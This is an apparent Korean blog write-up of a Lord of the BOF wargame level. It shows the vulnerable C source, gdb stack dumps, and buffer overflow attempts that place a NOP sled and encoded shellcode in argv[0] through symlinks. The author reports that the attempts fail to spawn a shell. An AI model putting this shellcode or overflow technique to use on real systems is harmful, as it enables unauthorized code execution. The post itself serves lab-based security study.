--------------------------------------------------------------------------------------------------------------------------
Sur3x5f Report - LOB Level10 [ Vampire -> Skeleton ]
--------------------------------------------------------------------------------------------------------------------------
[vampire@localhost vampire]$ ls
skeleton skeleton.c
[vampire@localhost vampire]$ cat skeleton.c
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i, saved_argc; // 새로운 놈이 등장했군요!
if(argc < 2){
printf("argv error\n"); // Argv 2개 이상써야댐
exit(0);
}
// egghunter
for(i=0; environ[i]; i++) // 환경변수 초기화
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf') // RTL 못 쓰게 금지
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){ // Argv[1] 의 내용 초기화
printf("argument is too long!\n");
exit(0);
}
// argc saver
saved_argc = argc; // saved_argc 함수를 argc 로 초기화합니다.
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40); // 버퍼 초기화
// ultra argv hunter!
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i])); // 인자를 모두 초기화 하는 막강한 놈이군요 -_____- ;
}
인자를 모두 초기화하는 진짜 말 그대로 더러운 놈 입니다.
어떻게 공격을 해야할까요... 보면 Argv[0] 은 프로그램이 실행되면 찌꺼기가 스택의 꼭대기로 올라가는
특이한 성질이 있습니다. 그러니깐 트롤처럼 Argv[0] 에 NOP 와 쉘코드를 넣어주고 소스로 찾는게 아닌
직접 GDB 로 분석해서 꼭대기로 리턴시켜주어야 합니다.
꼭대기에 어떤 찌꺼기가 있는지 확인해보도록 하겠습니다.
[vampire@localhost xodnr]$ ./skeleton aa
stack is still your friend.
[vampire@localhost xodnr]$ ulimit -c unlimited
[vampire@localhost xodnr]$ ./skeleton `python -c 'print "\xbf"*48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ gdb -q skeleton core
Core was generated by ` '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...ddone.
Reading symbols from /lib/ld-linux.so.2...idone.
#0 0xbfbfbfbf in ?? ()
(gdb) x/50x $esp
0xbffffb30: 0x00000000 0xbffffb74 0xbffffb80 0x40013868
0xbffffb40: 0x00000002 0x08048450 0x00000000 0x08048471
0xbffffb50: 0x08048500 0x00000002 0xbffffb74 0x08048390
0xbffffb60: 0x080486ac 0x4000ae60 0xbffffb6c 0x40013e90
0xbffffb70: 0x00000002 0xbffffc66 0xbffffc71 0x00000000
0xbffffb80: 0xbffffca2 0xbffffcc4 0xbffffcce 0xbffffcdc
0xbffffb90: 0xbffffcfb 0xbffffd0b 0xbffffd24 0xbffffd41
0xbffffba0: 0xbffffd4c 0xbffffd5a 0xbffffd9d 0xbffffdb0
0xbffffbb0: 0xbffffdc5 0xbffffdd5 0xbffffde2 0xbffffe01
0xbffffbc0: 0xbffffe0c 0xbffffe19 0xbffffe21 0xbfffffe4
0xbffffbd0: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffbe0: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffbf0: 0x00001000 0x00000007
(gdb)
0xbffffbf8: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffc08: 0x08048450 0x0000000b 0x000001fd 0x0000000c
0xbffffc18: 0x000001fd 0x0000000d 0x000001fd 0x0000000e
0xbffffc28: 0x000001fd 0x00000010 0x0fe9fbff 0x0000000f
0xbffffc38: 0xbffffc61 0x00000000 0x00000000 0x00000000
0xbffffc48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc58: 0x00000000 0x00000000 0x38366900 0x00000036
0xbffffc68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb8: 0x00000000 0x00000000
(gdb)
0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd80: 0x00000000 0x00000000
(gdb)
0xbffffd88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe48: 0x00000000 0x00000000
(gdb)
0xbffffe50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffec0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff10: 0x00000000 0x00000000
(gdb)
0xbfffff18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffd8: 0x00000000 0x00000000
(gdb)
0xbfffffe0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffff0: 0x732f2e00 0x656c656b 0x006e6f74 0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
끝 부분의 약간의 찌꺼기가 남아있는데 그 부분이 파일명, Argv[0] 부분이라고 하는데
정확히 왜 그런건지는 잘 모르겠습니다. 암튼 Argv[0] 을 이용해 공략하면 되는것이고 저번 페이로드처럼
공격하겠습니다.
[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[vampire@localhost xodnr]$ ll
total 84
-rw------- 1 vampire vampire 61440 Aug 27 21:13 core
-rwxrwxr-x 1 vampire vampire 12752 Aug 27 21:10 skeleton
-rw-r--r-- 1 vampire vampire 821 Aug 27 21:10 skeleton.c
lrwxrwxrwx 1 vampire vampire 8 Aug 27 21:21 ????????????????????????????????????????????????????????????????????????????????????????????????????ë?^1ɱ2?l?ÿ??é?uöë?èêÿÿÿ2ÁQi00tii0cjo?äQT?â?±?Î? -> skeleton
[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xbf\xfa\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿úÿ¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xfe\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿þÿÿ¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ ./`python -c 'print "\x90"*100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44 + "\xf0\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ðÿÿ¿
Segmentation fault (core dumped)
[vampire@localhost xodnr]$ ln -s skeleton `python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'`
[vampire@localhost xodnr]$ ./`python -c 'print "\x61\x61\xb8\xe0\x8a\x05\x40\x68\xf9\xbf\x0f\x40\xff\xd0"'` `python -c 'print "\x90"*44 + "\x26\xfc\xff\xbf"'`
&üÿ¿
Segmentation fault (core dumped)
그런데 계속해도 쉘이 뜨지를 않아서 코어를 확인해보았더니 정상적으로 들어가있습니다.
(gdb)
0xbfffff68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffff98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffa8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffc8: 0xeb909090 0xc9315e11 0x6c8032b1 0x8001ff0e
0xbfffffd8: 0xf67501e9 0xeae805eb 0x32ffffff 0x306951c1
0xbfffffe8: 0x69697430 0x6f6a6330 0x5451e48a 0xb19ae28a
0xbffffff8: 0x0081ce0c 0x00000000 Cannot access memory at address 0xc0000000
그래서 위의 주소로 이동시켜줘도 쉘이 뜨지를 않길래 한번 짧은 쉘코드를 써보았는데 그래도 쉘이 뜨지를 않았습니다. ㅠ;
이상하게 쉘이 뜨지를 않습니다. 나중에 꼭 다시 풀어보도록 하겠습니다.
'스터디 > wargames' 카테고리의 다른 글
| 파이썬 문제풀이, The Python Challenge Level1 문제풀이 (0) | 2013.09.11 |
|---|---|
| [BOF-Wargames] LOB Load of BOF LEVEL11 (Skeleton -> Golem) 문제풀이 (0) | 2011.09.04 |
| [BOF-Wargames] LOB Load of BOF LEVEL9 (troll -> vampire) 문제풀이 (0) | 2011.08.19 |
| [BOF-Wargames] LOB Load of BOF LEVEL8 (orge -> troll) 문제풀이 (0) | 2011.08.19 |
| [BOF-Wargames] LOB Load of BOF LEVEL7 (darkelf -> orge) 문제풀이 (0) | 2011.08.19 |
